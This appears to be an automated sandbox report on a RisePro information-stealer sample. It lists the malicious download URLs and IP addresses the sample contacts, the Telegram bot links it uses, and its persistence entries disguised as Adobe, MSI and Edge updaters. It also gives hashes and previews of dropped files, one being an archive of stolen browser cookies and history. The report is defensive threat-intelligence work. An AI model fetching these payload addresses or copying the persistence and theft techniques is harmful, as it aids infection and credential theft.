                    https://kuljyftgjk.online:80/file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/server/k/l2.exe5P#.file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/RiseProSUPPORTfile.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ipinfo.io/Mozilla/5.0file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brD87fZN3R3jFeplaces.sqlite.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exefile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tfile.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/risepro_botfile.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://kuljyftgjk.online:80/Ifile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://5.42.96.170/server/k/l2.exeDTlfile.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://5.42.96.170/server/k/l2.exe5file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/tfile.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://kuljyftgjk.online:80/server/k/l2.exe5Gfile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/server/k/l2.exexefNfile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLD87fZN3R3jFeplaces.sqlite.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/risepro_botisepro_botfile.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/server/k/l2.exeofile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.winimage.com/zLibDllfile.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ipinfo.io:443/widget/demo/12.205.151.60file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.orgD87fZN3R3jFeplaces.sqlite.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://kuljyftgjk.online/server/k/l2.exefile.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online:80/Mi&/file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://kuljyftgjk.online:80/server/k/l2.exeJGfile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/Bbfile.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/risepro_bot%(file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online/onsfile.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    34.117.186.192
                    		ipinfo.ioUnited States
                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                    5.42.96.65
                    		unknownRussian Federation
                    		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                    172.67.75.166
                    		db-ip.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    5.42.96.170
                    		unknownRussian Federation
                    		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1443534
                    Start date and time:2024-05-17 23:44:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 0s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@24/32@5/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 73%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:45:16API Interceptor5044664x Sleep call for process: file.exe modified
                    17:45:53API Interceptor1757121x Sleep call for process: oobeldr.exe modified
                    23:45:15Task SchedulerRun new task: MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR path: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    23:45:16Task SchedulerRun new task: MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG path: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    23:45:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    23:45:18Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    23:45:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    23:45:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                    Category:dropped
                    Size (bytes):697462
                    Entropy (8bit):7.9978720978672815
                    Encrypted:true
                    SSDEEP:12288:SGiq3xwkqDfTtkdTpKrZgIFxEtmeY3XV1ZiXUoqm:SVsxwR7TOTKr1rEtVY3Biko5
                    MD5:09613B60CB6D5DCD89B5B2D39F4345A8
                    SHA1:694B5F31527A749E51B3355A25C594C3FEE26308
                    SHA-256:30D7CB2080B3FDA7D9814C2967781C92F0FFC05B556DE8E2ACAA5EA627661349
                    SHA-512:8A5A9083C9E33CE59A4EBB8027594EF310239BFE6B18E19ED41D189C94FDC5B81C79AB04B921197E577E64DCABBC779C309AFF3414946C0BEEA5DACE4A0CB485
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, Author: Joe Security
                    Preview:PK...........X................Cookies\..PK...........X..E.............Cookies\Chrome_Default.txt....P.@.5.....d...`|L2J1l.. .3."_..N.......q..b..=../c.;{.........4F8...0..Y.........Z}Y.g.<w3.f.W(....K.o..l...!*.......y.o;.F..5%.....|0MS.....J.,....../.o...8.H...,M.......;.....I!.z.W....j...e....fE.?.X....6...g...skL.K.85b.U.5...[/.<.h....C..|...C5"{..i.$...'..W).f.O.i..4.....L..Z..t.Z(].2.m.?..<....]........f..I3?.q..8U.6...8.N.y_#Vb...g.k?.Z1.!.3$.....\.%...PK...........X................History\..PK...........X..H.A...p...,...History\Firefox_v6zchhhv.default-release.txt.())(...///......I../J./(.,KL..O.,JM...44.4312.06.....)5O74..V.PK...........X}..............information.txt.X]O.J.}.................2H...cw.......Y.....0m.......:Uu....M..c.....p..U.1.......S.1.\f......X.1...\..M....dLb...x...d..h......y..S.../.F..F.$...4K.1kGQ.QD........ppv.h.4L."..):7....T.Ej..z..2..L....".7........k.._d........|$'Y...........................?.?.k<._.....

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\02zdBXl47cvzcookies.sqlite

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\3b6N2Xdh3CYwplaces.sqlite

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.03859996294213402
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                    Malicious:false
